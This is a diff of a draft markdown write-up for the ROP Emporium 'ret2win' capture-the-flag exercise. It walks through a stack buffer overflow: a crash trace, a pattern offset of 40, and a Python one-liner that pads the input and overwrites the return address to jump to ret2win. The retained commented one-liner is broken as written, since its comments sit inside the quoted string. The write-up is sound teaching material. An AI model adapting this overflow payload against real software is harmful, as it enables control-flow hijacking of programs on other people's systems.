Mushi-mushi/mushi-mushi.github.io/WIP/ROP_Emporium.markdown

 Stopped reason: SIGSEGV
 0x0000000000400810 in pwnme ()
 {% endhighlight %}
-We can see that the stack pointer(RSP) has now been overwritten by the value "AA0AAFAAb"*.
-Using this value, we can determine how much padding will be needed before writting the address to the fonction ret2win@0x00400811
+We can see that the stack pointer(RSP) has now been overwritten by the value "AA0AAFAAb".
+Using this value, we can determine how much padding will be needed before writing the address to the function ret2win@0x00400811
 {% highlight bash%}
 pattern offset AA0AAFAAb
 AA0AAFAAb found at offset: 40
 {% endhighlight %}
-Now if all goes according to plan, the follow line should return the flags:
+Now if all goes according to plan, the following line should return the flags:
 {% highlight bash%}
-python -c 'print "\x90"*40 + "\x11\x08\x40\x00\x00\x00\x00\x00\x00"' | ./ret2win
 python -c 'print "\x90"*40                #Will take care of the padding +"\x11\x08\x40\x00\x00\x00\x00\x00\x00"'  #Will write our address into RSP